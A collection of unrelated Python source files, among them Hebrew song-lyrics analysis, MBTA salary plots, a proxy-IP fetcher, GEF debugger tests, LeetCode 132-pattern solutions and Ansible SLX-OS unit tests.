uniqe_per_decade[decade] = uniwq_words
for k,v in uniqe_per_decade.items():
secho(f"{k}: ", fg='blue', bold=True, nl=False)
secho(f"{', '.join(HebrewSongs.invert_words(v))}", fg='blue')
return uniqe_per_decade
def print_number_bits(self):
for decade in DECADES:
print(f"decade = {decade}")
self.get_number_bits(decade=decade)
def get_number_bits(self, decade):
lyrics = self.data[self.data['decade'] == decade]['lyrics']
lyrics_len = 0
for l in lyrics:
lyrics_len += len(l.split('\n\n'))
print(f"lyrics avrage = {lyrics_len / len(lyrics)}")
def analyze_song_sintiment(self):
from alephBERT import predict_single_text_with_norm
songs_sentiment = []
for _, row in tqdm(self.data.iterrows()):
lyrics = row['lyrics']
song_lines = get_songs_lines(lyrics)
all_song = []
for line in song_lines:
prediction = predict_single_text_with_norm(self.bert_classifier, line, 0.3, 0.8)
all_song.append(prediction)
if all_song.count(Emotions.sad) / len(all_song) > 0.2:
song_sentiment = Emotions.sad
elif all_song.count(Emotions.happy) / len(all_song) > 0.9:
song_sentiment = Emotions.happy
else:
song_sentiment = Emotions.norm
songs_sentiment.append(song_sentiment)
self.data['song_sentiment'] = songs_sentiment
self.data.to_csv('data/tagged_data.tsv', sep='\t')
def words_more_then(self, num_times=100):
words_dict = defaultdict(int)
freq_words = set()
for _, row in self.data.iterrows():
lyrics = row['lyrics']
song_words = lyrics.split(' ')
for word in song_words:
words_dict[word] += 1
for word, num in words_dict.items():
if num > num_times:
freq_words.add(word)
return freq_words
def add_name_in_song(self, num_times: int = 200):
name_in_song = []
freq_words = self.words_more_then(num_times)
for _, row in self.data.iterrows():
first_name = row['artist_name'].split()[0]
lyrics = row['lyrics']
if first_name not in freq_words:
name_in_song.append(first_name in lyrics.split(' '))
else:
name_in_song.append(False)
self.data['artist_name_in_song'] = name_in_song
def plot_name_in_song(self):
a = self.data[["artist_name_in_song", "decade"]].groupby("decade").mean()
plt.plot(DECADES, [a['artist_name_in_song'][decade] for decade in DECADES])
plt.title('artist name in a song')
plt.xlabel('decade')
plt.ylabel('num of songs with singer names in the song / total')
plt.legend()
plt.show()
def guess_from_words(self, artists_list, feture):
learn_feature = feture
learn_artists = self.data[self.data[learn_feature].isin(artists_list)]
train, test = train_test_split(learn_artists, test_size=0.2)
X = train["lyrics"]
Xtest = test["lyrics"]
vectorizer = CountVectorizer()
X_train = vectorizer.fit_transform(X)
X_test = vectorizer.transform(Xtest)
y_test = test[learn_feature]
y_train = train[learn_feature]
decision_tree = DecisionTreeClassifier(random_state=0, max_depth=4)
decision_tree = decision_tree.fit(X_train, y_train)
tree_text = export_text(decision_tree, feature_names=[HebrewSongs.invert_words(word) for word in vectorizer.get_feature_names()])
res_pred = decision_tree.predict(X_test)
score = accuracy_score(y_test, res_pred)
decision_tree.score(X_test, y_test)
print(tree_text)
print(score)
def split_for_test(self, artists_list, feature_check_name='artist_name'):
learn_feature = feature_check_name
know_featurs = ['hit', 'year', 'lyrics_len', 'song_sentiment', "artist_name_in_song", 'artist_name', 'gender']
# know_featurs = ['hit', 'lyrics_len', 'song_sentiment', 'artist_name']
if learn_feature in know_featurs:
know_featurs.remove(learn_feature)
# gapminder.year.isin(years)
learn_artists = self.data[self.data[feature_check_name].isin(artists_list)]
# print(learn_artists['artist_name'].value_counts())
X = learn_artists[know_featurs]
train, test = train_test_split(learn_artists, test_size=0.2)
# X = self.data["lyrics"]
# vectorizer = CountVectorizer()
# X_train = vectorizer.fit_transform(X)
X_train = train[know_featurs]
X_test = test[know_featurs]
y_test = test[learn_feature]
y_train = train[learn_feature]
return X_train, X_test, y_test, y_train, know_featurs
def guess_the_artist(self, artists_list, feature_check_name='artist_name'):
X_train, X_test, y_test, y_train, know_featurs = self.split_for_test(artists_list, feature_check_name)
decision_tree = DecisionTreeClassifier(random_state=0, max_depth=4)
decision_tree = decision_tree.fit(X_train, y_train)
tree_text = export_text(decision_tree, feature_names=know_featurs)
res_pred = decision_tree.predict(X_test)
score = accuracy_score(y_test, res_pred)
decision_tree.score(X_test, y_test)
print(tree_text)
# print(score)
def predict_with_mnb(self, artists_list, feature_check_name='artist_name'):
X_train, X_test, y_test, y_train, know_featurs = self.split_for_test(artists_list, feature_check_name)
mnb = MultinomialNB()
mnb.fit(X_train, y_train)
mnb_prediction = mnb.predict(X_test)
y_test = np.array(y_test)
evaluate(mnb_prediction, y_test)
def learn_from_lyrics(self):
self.data['decade'] = [int(int(year) / 10) * 10 if type(year) != float and year.isdigit() else 0 for year in self.data["year"]]
self.data = self.data[self.data["decade"] >= 1970]
X = self.data["lyrics"]
y = self.data["decade"]
vectorizer = CountVectorizer()
mnb = MultinomialNB()
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)
X_train = vectorizer.fit_transform(X_train)
mnb.fit(X_train, y_train)
X_test = vectorizer.transform(X_test)
y_test = np.array(y_test)
mnb_prediction = mnb.predict(X_test)
evaluate(mnb_prediction, y_test)
return X_train, X_test, y_train, y_test, vectorizer
def learn_decade(self,learn_feature='gender'):
X = self.data[['hit', 'decade', 'lyrics_len']]
# X = self.data["lyrics"]
vectorizer = CountVectorizer()
# X_train = vectorizer.fit_transform(X)
X_train = X
featurs = ['hit', 'decade', 'lyrics_len']
y = self.data[learn_feature]
decision_tree = DecisionTreeClassifier(random_state=0, max_depth=3)
decision_tree = decision_tree.fit(X_train, y)
r = export_text(decision_tree, feature_names=featurs)
res_pred = decision_tree.predict(X)
score = accuracy_score(y, res_pred)
decision_tree.score(X_train, y)
print(r)
print(score)
tree.plot_tree(decision_tree, feature_names=featurs)
plt.show()
def write_measure_of_sadness_and_joy(self, bert_classifier):
from alephBERT import predict_single_text_with_norm
happiest_scores = []
saddest_scores = []
for _, row in tqdm(self.data.iterrows()):
song_lines = get_songs_lines(row['lyrics'])
all_song = [predict_single_text_with_norm(bert_classifier, line, 0.3,0.8) for line in song_lines]
happiest_score = all_song.count(Emotions.happy) / len(all_song)
saddest_score = all_song.count(Emotions.sad) / len(all_song)
happiest_scores.append(happiest_score)
saddest_scores.append(saddest_score)
self.data['happiest_score'] = happiest_scores
self.data['saddest_score'] = saddest_scores
self.data.to_csv('data/tagged_data__new.tsv', sep='\t')
def add_rhymes(self, normalize: bool = False):
rhymes = []
for _, row in tqdm(self.data.iterrows()):
song_lines = get_songs_lines(row['lyrics'])
current_rhymes_sequence = 0
total_rhymes_sequence = 0
for i in range(1, len(song_lines)):
last_line = song_lines[i-1].replace(",","").replace(".","").strip()
current_line = song_lines[i].replace(",","").replace(".","").strip()
if last_line and current_line and last_line[-2:] == current_line[-2:]:
current_rhymes_sequence += 1
else:
total_rhymes_sequence += current_rhymes_sequence
current_rhymes_sequence = 0
rhymes.append(total_rhymes_sequence / (len(song_lines) if normalize else 1))
self.data['rhymes'] = rhymes
def plot_rymes(self):
a = model.data.groupby('decade')["rhymes"].mean()
x_deta = []
y_deta = []
for x,y in a.items():
if 1970<=float(x)<=2020:
x_deta.append(y)
y_deta.append(float(x))
plt.plot(y_deta,x_deta)
plt.title(f"Average number of rymes vs decade")
plt.xlabel(f"Decade")
plt.ylabel(f"Average number of rymes in song")
plt.show()
def get_most_happiest_songs(self,number_of_happy_songs=10):
data = self.data.sort_values("happiest_score", ascending=False)
happiest_songs = []
for _, row in tqdm(data.iterrows()):
# curr_score = row['happiest_score'] / len(row['lyrics'].split())
curr_score = row['happiest_score']
happiest_songs.append((row, curr_score))
happiest_songs = sorted(happiest_songs, key=lambda x: x[1], reverse=True)
print(happiest_songs[:number_of_happy_songs])
return happiest_songs[:number_of_happy_songs]
def get_most_saddest_songs(self, number_of_sad_songs=10):
data = self.data.sort_values("saddest_score", ascending=False)
saddest_songs = []
for _, row in tqdm(data.iterrows()):
curr_score = row['saddest_score'] / len(row['lyrics'].split())
saddest_songs.append((row, curr_score))
saddest_songs = sorted(saddest_songs, key=lambda x: x[1], reverse=True)
print(saddest_songs[:number_of_sad_songs])
return saddest_songs[:number_of_sad_songs]
@staticmethod
def get_stop_words(path: str) -> Set[str]:
with open(path, 'r', encoding='utf8') as f:
return set(f.read().split('\n'))
@staticmethod
def invert_words(words):
return [w[::-1] for w in words]
def write_test_and_train_csv():
for data_type in ["test", 'train']:
dataset = load_dataset("hebrew_sentiment")
labels = []
texts = []
MAX_LEN_ENCODE = 120
for data in dataset[data_type]:
text = data["text"].replace(',', '')
if len(text) < MAX_LEN_ENCODE and int(data["label"]) != 2:
labels.append(data["label"])
texts.append(deEmojify(text))
df = pd.DataFrame({'label': labels, 'text': texts}, columns=['label', 'text'])
df.to_csv(f'data/{data_type}_sentiment.csv')
def deEmojify(text):
regrex_pattern = re.compile(pattern="["
u"\U0001F600-\U0001F64F" # emoticons
u"\U0001F300-\U0001F5FF" # symbols & pictographs
u"\U0001F680-\U0001F6FF" # transport & map symbols
u"\U0001F1E0-\U0001F1FF" # flags (iOS)
"]+", flags=re.UNICODE)
return regrex_pattern.sub(r'', text)
def get_songs_lines(song) -> List[str]:
song_lines_not_filtered = song.split('\n')
song_lines = [line for line in song_lines_not_filtered if line != '']
return song_lines
if __name__ == '__main__':
# pass
model = HebrewSongs()
# model.get_artists_gender(hits=True)
# model.get_artists_gender()
# model.get_ngram_most_common(20, ngram_range=(2, 2), decade=1970)
# for dacade in [1970, 1980, 1990, 2000, 2010, 2020]:
# model.get_ngram_most_common(20, ngram_range=(2, 2), decade=dacade, show=False)
# model.uniqe_ngram_per_decade(ngram_range=(3,4))
# model.plot_name_in_song()
# model.get_song_length_from_years()
# model.plot_rymes()
# data = model.data.sort_values("rhymes", ascending=False)
# i = 0
# for row in data.iterrows():
# print(row)
# i += 1
# if i == 3:
# break
# model.get_emotions_plot(hits=True)
# model.get_emotions_to_wars_plot()
# model.get_most_saddest_songs(number_of_sad_songs=5)
# model.get_most_happiest_songs(number_of_happy_songs=5)
# for year in [1970, 1980, 1990, 2000, 2010, 2020]:
# mean_happiest = model.data.loc[model.data['decade'] == year]["happiest_score"].mean()
# mean_saddest = model.data.loc[model.data['decade'] == year]["saddest_score"].mean()
# mean_rhymes = model.data.loc[model.data['decade'] == year]["rhymes"].mean()
# secho(f"{year}", fg="blue", bold=True)
# secho(f" Happy mean: {mean_happiest}", fg="blue")
# secho(f" Sad mean: {mean_saddest}", fg="blue")
# secho(f" Rhymes mean: {mean_rhymes}", fg="blue")
model.learn_from_lyrics()
# model.guess_the_artist(['הדג נחש' ,'שרית חדד' ,'כוורת' ,'עומר אדם' ,'אייל גולן' ,'נועה קירל'])
|
990,932 | d6c3ceca2e97a6a08f21abdbfb95e421d4cbd588 | ###############################################################################
''''''
###############################################################################
from .. import _classtools
from .._ptolemaic import Ptolemaic as _Ptolemaic
from ._ur import *
from .var import *
from .dat import *
from .seq import *
from .inc import *
from .non import *
###############################################################################
###############################################################################
|
990,933 | 2327b9c1cea89dbadd0d10e009fd4a5144d056a5 | from matplotlib.pyplot import figure
import typing
import pandas
import numpy as np
def doplot(
data: pandas.DataFrame, ind: np.ndarray, saltype: str, thres: float, ax
) -> typing.Tuple[float, float, float, float, float]:
# %% for analysis, remove new trainees arbitrarily chosen making less than threshold
sal = data['Salary'][ind]
sal = sal[sal > thres]
# %% plot
if ax is not None:
(sal / 1000).hist(ax=ax, bins=16)
ax.set_xlim(0, 260)
ax.set_title(f'{saltype}')
return sal.max(), sal.median(), sal.quantile(0.9), sal.sum(), ind.sum()
def summaryplot(fg, ax, st: pandas.DataFrame, data: pandas.DataFrame, year: int):
for a in ax[:, 0]:
a.set_ylabel('Number of occurrences')
for a in ax[1, :]:
a.set_xlabel(f'{year} Salary [$1000 USD]')
fg.suptitle(f'{year} MBTA salary histograms', fontsize='xx-large')
fg.tight_layout()
fg.subplots_adjust(top=0.93)
maxearner = data.loc[data['Salary'].idxmax(), :]
maxsalary = maxearner['Salary']
try:
maxearnerOT = maxsalary - maxearner['ProjSal']
print(
f'\nhighest earning MBTA staff ${maxsalary:.0f} in {year} was a {maxearner["Title"]},'
f' including estimated ${maxearnerOT:.0f} overtime.\n'
)
except KeyError:
print(f'\nhighest earning MBTA staff ${maxsalary:.0f} in {year} was a {maxearner["Title"]}')
# %%
fg = figure()
ax = fg.gca()
(st.ix[:-1, 'subtot'] / 1e8).sort_values().plot(kind='bar')
ax.set_ylabel('expenditure [$10M]')
ax.set_title('MBTA {} salary expenditure by category'.format(year))
fg.subplots_adjust(bottom=0.15)
|
990,934 | 30cee57c7d88dbb7fab087338a4797525a2ea4f4 | # -*- coding: utf-8 -*-
import sys
from os.path import basename
from pprint import pprint
from commando import Application, command, subcommand, version, store, true, param
import ROOT as R
from minty.main import make_main
import results
import datasets
import jobs
import plot
import fit
class Engine(Application):
@command(description='Engine - Turbo powered',
epilog='Use %(prog)s {command} -h to get help on individual commands')
@version('-v', '--version', version='%(prog)s 0.1')
@store('-k', '--key', default='.', help="Key to start the engine")
def main(self, params):
"""
Will not be executed. A sub command is required. This function exists to provide
common parameters for the subcommands and some generic stuff like version and
metadata
"""
pass
mergeall = results.mergeall
reduce = results.reduce
mergereduce = results.mergereduce
dump = results.dump
dump_grl = results.dump_grl
dump_files = results.dump_files
status = results.status
kick = results.kick
logexplore = results.logexplore
mcupdateinfo = results.mcupdateinfo
mcrescale = results.mcrescale
make_datasets = datasets.make_datasets
dsupdate = datasets.dsupdate
dsbuild = datasets.dsbuild
dscheck = datasets.dscheck
dsdiff = datasets.dsdiff
submit = jobs.submit
draw = plot.draw
multifit = fit.multifit
@subcommand('browse', help='Start a TBrowser')
@param('files', nargs="*")
def browse(self, params):
from IPython.Shell import IPShellEmbed as IP
files = params.files
if not files:
files = ["all.root"]
all_files = [R.TFile(f) for f in files]
browsers = [R.TBrowser(f.GetName(), f) for f in all_files]
# Start ipython
IP()()
def main():
from minty.utils import init_root
from minty.utils.logger import log_level
from logging import DEBUG
with log_level(DEBUG):
init_root()
Engine().run()
|
990,935 | a18d8098d4b87661bff2d12b105abaa3afe9f3d3 | # -*- coding: utf-8 -*-
from With_DB import Mysql_DB
class Proxy(object):
def __init__(self):
self.db = Mysql_DB()
def GetIP(self): # 先委屈下放sql里,之后想办法放到redis里去管理
#sql = "SELECT ip, port FROM proxys WHERE id >= ((SELECT MAX(id) FROM proxys)-(SELECT MIN(id) FROM proxys)) * RAND() + (SELECT MIN(id) FROM proxys) LIMIT 1"
sql = "SELECT ip FROM proxys WHERE id >= ((SELECT MAX(id) FROM proxys)-(SELECT MIN(id) FROM proxys)) * RAND() + (SELECT MIN(id) FROM proxys) LIMIT 1"
try:
ip_middle = self.db.Query_MySQL(sql)
#ip = str(ip_middle[0][0]) + ':' + str(ip_middle[0][1])
ip = str(ip_middle[0][0])
ip_ok = "http://" + ip
return ip_ok
except Exception as e:
print ('读取代理ip错误' + str(e))
|
990,936 | 54b7fdf41babc234a4fec7ca20cf9d8406adef10 | """
GDB function test module for ELF section convenience functions
"""
from tests.utils import _target, gdb_run_cmd, gdb_run_silent_cmd, gdb_start_silent_cmd, is_64b
from tests.utils import GefUnitTestGeneric
class ElfSectionGdbFunction(GefUnitTestGeneric):
"""GDB functions test module"""
def test_func_base(self):
"""`$_base()` GDB function test"""
cmd = "x/s $_base()"
self.assertFailIfInactiveSession(gdb_run_cmd(cmd))
res = gdb_start_silent_cmd(cmd)
self.assertNoException(res)
self.assertIn("\\177ELF", res)
addr = res.splitlines()[-1].split()[0][:-1]
cmd = "x/s $_base(\"libc\")"
res = gdb_start_silent_cmd(cmd)
self.assertNoException(res)
self.assertIn("\\177ELF", res)
addr2 = res.splitlines()[-1].split()[0][:-1]
self.assertNotEqual(addr, addr2)
def test_func_bss(self):
"""`$_bss()` GDB function test"""
cmd = "deref $_bss()"
target = _target("bss")
self.assertFailIfInactiveSession(gdb_run_cmd(cmd, target=target))
res = gdb_run_silent_cmd(cmd, target=target)
self.assertNoException(res)
self.assertIn("Hello world!", res)
def test_func_got(self):
"""`$_got()` GDB function test"""
cmd = "deref $_got()"
target = _target("heap")
self.assertFailIfInactiveSession(gdb_run_cmd(cmd, target=target))
res = gdb_run_silent_cmd(cmd, target=target)
self.assertNoException(res)
self.assertIn("malloc", res)
def test_func_heap(self):
"""`$_heap()` GDB function test"""
cmd = "deref $_heap()"
target = _target("heap")
self.assertFailIfInactiveSession(gdb_run_cmd(cmd, target=target))
res = gdb_run_silent_cmd(cmd, target=target)
self.assertNoException(res)
if is_64b():
self.assertIn("+0x0048:", res)
else:
self.assertIn("+0x0024:", res)
cmd = "deref $_heap(0x10+0x10)"
res = gdb_run_silent_cmd(cmd, target=target)
self.assertNoException(res)
if is_64b():
self.assertIn("+0x0048:", res)
else:
self.assertIn("+0x0024:", res)
def test_func_stack(self):
"""`$_stack()` GDB function test"""
cmd = "deref $_stack()"
self.assertFailIfInactiveSession(gdb_run_cmd(cmd))
res = gdb_start_silent_cmd(cmd)
self.assertNoException(res)
if is_64b():
self.assertRegex(res, r"\+0x0*20: *0x0000000000000000\n")
else:
self.assertRegex(res, r"\+0x0.*20: *0x00000000\n")
|
990,937 | 41a293b0ac82acdb418f94fc1720ea5150f0e734 | # import...as for abbreviations
import statistics as stat
grades = [89, 56, 78, 34, 23]
print(stat.mean(grades))
|
990,938 | ac3a1fd0bf2e0e3e33a6458f91f8c3ca19230608 | Leninsky_photo = [
"encyclopedia_leninsky_guestion_1", "encyclopedia_leninsky_guestion_2","encyclopedia_leninsky_guestion_3", "encyclopedia_leninsky_guestion_4", "encyclopedia_leninsky_guestion_5","encyclopedia_leninsky_guestion_6",
"encyclopedia_leninsky_guestion_7","encyclopedia_leninsky_guestion_8","encyclopedia_leninsky_guestion_9", "encyclopedia_leninsky_guestion_10","encyclopedia_leninsky_guestion_11","encyclopedia_leninsky_guestion_12",
"encyclopedia_leninsky_guestion_13","encyclopedia_leninsky_guestion_14","encyclopedia_leninsky_guestion_15","encyclopedia_leninsky_guestion_16","encyclopedia_leninsky_guestion_17","encyclopedia_leninsky_guestion_18",
"encyclopedia_leninsky_guestion_19","encyclopedia_leninsky_guestion_20","encyclopedia_leninsky_guestion_21","encyclopedia_leninsky_guestion_22","encyclopedia_leninsky_guestion_23","encyclopedia_leninsky_guestion_24",
"encyclopedia_leninsky_guestion_25","encyclopedia_leninsky_guestion_26","encyclopedia_leninsky_guestion_27","encyclopedia_leninsky_guestion_28",
]
max_len=len(Leninsky_photo)
|
990,939 | 32911332687880c552f5d8b75ad3f83247c522a2 | def Evaluation(Word1,Word2):
if len(Word1)<len(Word2):
mini=len(Word1)
maxi=len(Word2)
else:
mini=len(Word2)
maxi=len(Word1)
SameValue=0 # counter to poso idia eiani ta 2 string
for i in range(0,mini):
if Word1[i]==Word2[i]:
SameValue=SameValue+1
SameValue=float(SameValue)
EvalPersent=(SameValue/maxi)*100
return EvalPersent
Eval=Evaluation('miltos','miltiadis')
print Eval
|
990,940 | 404b7c5e8a6710b38d8ff140fa3524cf1d56556b | # Write a function to find the longest common prefix
# string amongst an array of strings.
class Solution(object):
def longestCommonPrefix(self, strs):
"""
:type strs: List[str]
:rtype: str
"""
min_len, ans = 2**32, 0
min_index = 0
if len(strs) == 0:
return ""
for i in xrange(len(strs)):
if len(strs[i]) < min_len:
min_len = len(strs[i])
min_index = i
if min_len == 0:
return ""
else:
xstr = strs[min_index]
i = 1
while (i <= min_len):
tmp_arr = [xstr[:i] in s[:i] for s in strs]
if (sum(tmp_arr) == len(strs)) and (i >= ans):
ans = i
i += 1
return xstr[:ans] |
990,941 | 71d61cb7829129202c70e327fe314ac7bd95206b | # coding=utf-8
import logging
import time
import urllib
logger = logging.getLogger(__name__)
def getIp():
order = "8eb1b6753a6652c56f1a05f132cb304f"
apiUrl = "http://dynamic.goubanjia.com/dynamic/get/" + order + ".html"
try:
ress = urllib.urlopen(apiUrl).read().strip("\n")
print("---???---" + ress)
if "too many requests".startswith(ress):
logger.info("-------------too many requests---------------------")
time.sleep(6)
return getIp()
else:
logger.info("-------------ip 代理获取-------------------")
return ress
except Exception as e:
print(e)
logger.info("-----------------:ip获取异常 睡眠五秒:-----------------")
time.sleep(6)
logger.info("-----------------:ip获取异常:-----------------")
return getIp()
# def getHtmlIp():
# targetUrl = "http://1212.ip138.com/ic.asp"
# ip=getIp()
# logger.info(ip)
# proxy_handler = urllib2.ProxyHandler({
# 'http': 'http://' + ip
# })
# opener = urllib2.build_opener(proxy_handler)
# html = opener.open(targetUrl)
# print(html.read().decode("utf-8"))
|
990,942 | 985d1a1ef067574c9f76cbc3806bf98a36dad6e1 | #!/usr/bin/python env
# coding: utf-8
from ConfigParser import ConfigParser
import os
root = os.path.abspath(".")
config_path = os.path.join(root, "config")
# 导入配置
config = ConfigParser()
config.read(os.path.join(config_path, "db.conf"))
# 要迁移的数据库
migrate_db_dict = dict(config.items("migrate_db"))
migrate_db_dict["port"] = int(migrate_db_dict["port"])
# 广告线下数据库
ads_offline_db_dict = dict(config.items("db"))
ads_offline_db_dict["port"] = int(ads_offline_db_dict["port"])
# 同步CpcFinanceDetail
finance_dict = dict(config.items("dev_db"))
finance_dict["port"] = int(finance_dict["port"])
|
990,943 | 549e7c8eae2ce26027a2732e141947cca244486e | /home/jibin/anaconda3/lib/python3.6/codecs.py |
990,944 | dbcfa52a22163cc418b38d16c0e2a863604cb7f3 | from math import floor
record = float(input())
meters = float(input())
seconds_per_meter = float(input())
time = meters * seconds_per_meter
resistance_seconds = floor(meters / 15) * 12.5
# resistance_seconds = int(meters / 15 * 12.5)
diff = record - (time + resistance_seconds)
if diff > 0:
print(f"Yes, he succeeded! The new world record is {time + resistance_seconds:.2f} seconds.")
else:
print(f"No, he failed! He was {abs(diff):.2f} seconds slower.")
|
990,945 | 3177c8450ef94d1b9279d77d82995d57001253b4 | from typing import List
class Solution:
def find132pattern(self, nums: List[int]) -> bool:
""" 暴力法,o(n^3) 复杂度 不推荐 """
i = 0
n = len(nums)
while i < n - 2:
j = i + 1
while i < j < n - 1:
k = j + 1
while j < k < n:
if nums[i] < nums[k] < nums[j]:
return True
k += 1
j += 1
i += 1
return False
class Solution1:
def find132pattern(self, nums: List[int]) -> bool:
""" 超出时间限制,暴力法:https://leetcode-cn.com/problems/132-pattern/solution/fu-xue-ming-zhu-cong-bao-li-qiu-jie-dao-eg78f/
时间复杂度:O(N^2)O(N 2)
空间复杂度:O(1)O(1)
"""
n = len(nums)
numsi = nums[0]
for j in range(1, n):
for k in range(j + 1, n):
if nums[j] > nums[k] > numsi:
return True
numsi = min(numsi, nums[j])
return False
class Solution2:
def find132pattern(self, nums: List[int]) -> bool:
""" 单调栈 https://leetcode-cn.com/problems/132-pattern/solution/xiang-xin-ke-xue-xi-lie-xiang-jie-wei-he-95gt/
Azson comment:官方题解讲得太多了,没看懂,这个看懂了 说下理解,就是单调栈维护的是3,max_k维护的是2,枚举的是1, max_k来源与单调栈,所以其索引一定大于栈顶的元素,但其值一定小于栈顶元素,故栈顶元素就是3,即找到了对“32”。 于是当出现nums[i] < max_k时,即找到了"12",这个时候一定会有3个元素的,而栈顶3必定大于2,故也大于1,即满足“132”
利用了单调栈,但是并不是 求next greater value,这是单调栈不同的一种应用
"""
stack = deque()
k = - 10 ** 9 - 1
n = len(nums)
for i in range(n - 1, -1, -1):
if nums[i] < k:
return True
while stack and stack[-1] < nums[i]:
k = max(stack.pop(), k)
stack.append(nums[i])
return False
# my latest try
n = len(nums)
# stack :非绝对单调递减栈,j 值 为stack[0]
stack = []
# k 值
max_k_val = float(-inf)
for i in range(n - 1, -1, -1):
while stack and nums[stack[-1]] < nums[i]:
max_k_val = max(nums[stack.pop()], max_k_val)
if stack and nums[i] < max_k_val:
return True
stack.append(i)
return False
# 跟方法三一样,只是k 从前往后loop
n = len(nums)
mi = [nums[0]]
for num in nums[1:]:
mi.append(min(mi[-1], num))
# mi: 前缀最小值, i 来自其中
# stack:绝对单调递减栈 for j
stack = []
# k 值
for k in range(1, n):
while stack and nums[stack[-1]] <= nums[k]:
stack.pop()
# stack[-1] -> j
if stack and nums[k] > mi[stack[-1] - 1]:
return True
stack.append(k)
return False
class Solution3:
def find132pattern(self, nums: List[int]) -> bool:
""" 单调栈monotone stack 只用来解决Next Greater Element 问题
https://leetcode-cn.com/problems/132-pattern/solution/132mo-shi-by-leetcode-2/ 的图解
https://leetcode-cn.com/problems/132-pattern/solution/zhan-jie-fa-chao-xiang-xi-ti-jie-by-siyy/ 的图与文字
https://github.com/labuladong/fucking-algorithm/blob/master/%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84%E7%B3%BB%E5%88%97/%E5%8D%95%E8%B0%83%E6%A0%88.md :单调栈模版
vector<int> nextGreaterElement(vector<int>& nums) {
vector<int> res(nums.size()); // 存放答案的数组
stack<int> s;
// 倒着往栈里放
for (int i = nums.size() - 1; i >= 0; i--) {
// 判定个子高矮
while (!s.empty() && s.top() <= nums[i]) {
// 矮个起开,反正也被挡着了。。。
s.pop();
}
// nums[i] 身后的 next great number
res[i] = s.empty() ? -1 : s.top();
//
s.push(nums[i]);
}
return res;
}
"""
mi = [nums[0]]
for num in nums[1:]:
mi.append(min(mi[-1], num))
print(mi)
stack = []
j = len(nums) - 1
while j >= 0:
if nums[j] > mi[j]:
while stack and stack[-1] <= mi[j]:
stack.pop()
if stack and stack[-1] < nums[j]:
return True
stack.append(nums[j])
j -= 1
return False
|
990,946 | d878afd96c0f4cac9e4d6b93bc7b84cbb7d2e4ce | #
# (c) 2018 Extreme Networks Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import json
from mock import MagicMock, patch, call
from ansible_collections.community.network.tests.unit.compat import unittest
from ansible_collections.community.network.plugins.module_utils.network.slxos import slxos
class TestPluginCLIConfSLXOS(unittest.TestCase):
""" Test class for SLX-OS CLI Conf Methods
"""
def test_get_connection_established(self):
""" Test get_connection with established connection
"""
module = MagicMock()
connection = slxos.get_connection(module)
self.assertEqual(connection, module.slxos_connection)
@patch('ansible_collections.community.network.plugins.module_utils.network.slxos.slxos.Connection')
def test_get_connection_new(self, connection):
""" Test get_connection with new connection
"""
socket_path = "little red riding hood"
module = MagicMock(spec=[
'fail_json',
])
module._socket_path = socket_path
connection().get_capabilities.return_value = '{"network_api": "cliconf"}'
returned_connection = slxos.get_connection(module)
connection.assert_called_with(socket_path)
self.assertEqual(returned_connection, module.slxos_connection)
@patch('ansible_collections.community.network.plugins.module_utils.network.slxos.slxos.Connection')
def test_get_connection_incorrect_network_api(self, connection):
""" Test get_connection with incorrect network_api response
"""
socket_path = "little red riding hood"
module = MagicMock(spec=[
'fail_json',
])
module._socket_path = socket_path
module.fail_json.side_effect = TypeError
connection().get_capabilities.return_value = '{"network_api": "nope"}'
with self.assertRaises(TypeError):
slxos.get_connection(module)
@patch('ansible_collections.community.network.plugins.module_utils.network.slxos.slxos.Connection')
def test_get_capabilities(self, connection):
""" Test get_capabilities
"""
socket_path = "little red riding hood"
module = MagicMock(spec=[
'fail_json',
])
module._socket_path = socket_path
module.fail_json.side_effect = TypeError
capabilities = {'network_api': 'cliconf'}
connection().get_capabilities.return_value = json.dumps(capabilities)
capabilities_returned = slxos.get_capabilities(module)
self.assertEqual(capabilities, capabilities_returned)
@patch('ansible_collections.community.network.plugins.module_utils.network.slxos.slxos.Connection')
def test_run_commands(self, connection):
""" Test get_capabilities
"""
module = MagicMock()
commands = [
'hello',
'dolly',
'well hello',
'dolly',
'its so nice to have you back',
'where you belong',
]
responses = [
'Dolly, never go away again1',
'Dolly, never go away again2',
'Dolly, never go away again3',
'Dolly, never go away again4',
'Dolly, never go away again5',
'Dolly, never go away again6',
]
module.slxos_connection.get.side_effect = responses
run_command_responses = slxos.run_commands(module, commands)
calls = []
for command in commands:
calls.append(call(
command,
None,
None
))
module.slxos_connection.get.assert_has_calls(calls)
self.assertEqual(responses, run_command_responses)
@patch('ansible_collections.community.network.plugins.module_utils.network.slxos.slxos.Connection')
def test_load_config(self, connection):
""" Test load_config
"""
module = MagicMock()
commands = [
'what does it take',
'to be',
'number one?',
'two is not a winner',
'and three nobody remember',
]
slxos.load_config(module, commands)
module.slxos_connection.edit_config.assert_called_once_with(commands)
|
990,947 | bd7be83833c964277600814f4d597d03115a833f | from pathlib import Path
src_data_path = Path(__file__)
|
990,948 | 1a37e083e00e475ee2f9d03b80b671667a27ba0d | # -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-10-23 08:59
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('deals', '0002_auto_20171021_1137'),
]
operations = [
migrations.AddField(
model_name='deal',
name='buy_url',
field=models.URLField(blank=True, null=True),
),
]
|
990,949 | 992b0f733c317b6154b62b115cd874b1d234dda5 |
import numpy as np
from scipy import stats
x = np.array([ 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 2., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 2., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1., 1.,
